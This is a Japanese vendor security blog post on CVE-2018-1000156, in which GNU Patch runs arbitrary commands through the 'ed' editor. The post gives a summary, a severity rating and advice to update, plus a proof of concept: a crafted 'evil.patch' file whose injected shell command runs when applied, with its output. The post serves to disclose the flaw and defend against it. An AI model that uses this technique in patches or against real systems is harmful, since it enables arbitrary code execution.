GNU Patchの脆弱性(CVE-2018-1000156) — | サイオスOSS | サイオステクノロジー

GNU Patchの脆弱性(CVE-2018-1000156) — | サイオスOSS | サイオステクノロジー

GNU Patchの脆弱性(CVE-2018-1000156)

04/06/2018にGNU Patchの脆弱性情報(CVE-2018-1000156)が公開されています。今回はこの脆弱性の概要と、各ディストリビューションの対応について簡単にまとめてみます。


こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面 和毅です。

04/06/2018にGNU Patchの脆弱性情報(CVE-2018-1000156)が公開されています。今回はこの脆弱性の概要と、各ディストリビューションの対応について簡単にまとめてみます。



Priority

Important

修正方法

各ディストリビューションの情報を確認してください。

CVE概要(詳細はCVEのサイトをご確認ください)

  • http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000156
    • edを経由した任意のコマンド実行の可能性

    • 重要度 – Important

    • GNU Patch で”ed”がインストールされている場合に発生します。GNU Patchが”ed”を起動した際に、”ed”を経由して任意のコマンドを実行することが出来ます。

PoC

“ed”がインストールされている環境で発生します。

  1. カレントディレクトリに”beep.c”ファイルを作成します。

    [omok@katello ~]$ touch beep.c
    
  2. カレントディレクトリに、”evil.patch”として、次のファイルを作成します。!と”.”で始まる箇所があるのに注意してください。

    --- /dev/null   2018-13-37 13:37:37.000000000 +0100
    +++ b/beep.c    2018-13-37 13:38:38.000000000 +0100
    1337a
    1,112d
    !touch /tmp/0wned; ls -la /tmp/0wned
    .
    
  3. カレントディレクトリで”patch < evil.patch”を実行すると、/tmpに”0wned”ファイルを作成し、ls -laの結果を出力します。

    [omok@katello ~]$ patch < evil.patch
    ?
    ?
    -rw-rw-r--. 1 omok omok 0  4月  8 15:20 /tmp/0wned
    ?
    patch: **** /usr/bin/ed FAILED
    

主なディストリビューションの対応方法

詳細は、各ディストリビューションの提供元にご確認ください


対処方法

各ディストリビューションの案内に従い、アップデートを行ってください。全てのRed Hat製品でパッチが行き渡っているかを確認するには、Red Hat Satelliteを使うと管理が便利でしょう。

Red Hat Satelliteを用いた一般的なErattaの適用は、『Red Hat Satellite 6でerrataを適用してみる』を 参考にして下さい。

[参考]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000156

セキュリティ系連載案内

タイトルとURLをコピーしました